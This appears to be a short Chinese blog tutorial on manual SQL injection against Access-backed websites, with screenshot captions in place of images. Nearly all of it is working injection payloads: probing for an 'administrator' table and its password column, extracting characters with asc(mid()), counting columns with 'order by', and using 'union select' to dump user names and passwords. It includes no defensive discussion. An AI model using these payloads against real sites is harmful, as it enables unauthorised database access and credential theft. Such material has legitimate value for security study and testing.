注入之access数据库(手工注入)

猜解数据库表名和字段
    

and exists(select user_name from administrator)    (找到注入点拼接语句)
        注入之access数据库(手工注入)_第1张图片

密码字段
    

and exists(select password from administrator)
        注入之access数据库(手工注入)_第2张图片

猜解字段内容
    

and (select top 1 asc(mid(user_name,1,1)) from administrator)>0

SQL注入中的高级查询
  

  •  order by

        order by 7

注入之access数据库(手工注入)_第3张图片

   order by 8   (出现错误,说明只存在7)

注入之access数据库(手工注入)_第4张图片

  •   union select

        union select 1,2,3,4,5,6,7 from administrator

注入之access数据库(手工注入)_第5张图片

 2.3可以读写       union select 1,user_name,password,4,5,6,7 from administrator

注入之access数据库(手工注入)_第6张图片

注入之access数据库(手工注入)_第7张图片

  •     偏移注入
  •     注入跨库查询

你可能感兴趣的:(常见的漏洞,数据库,sql,mysql)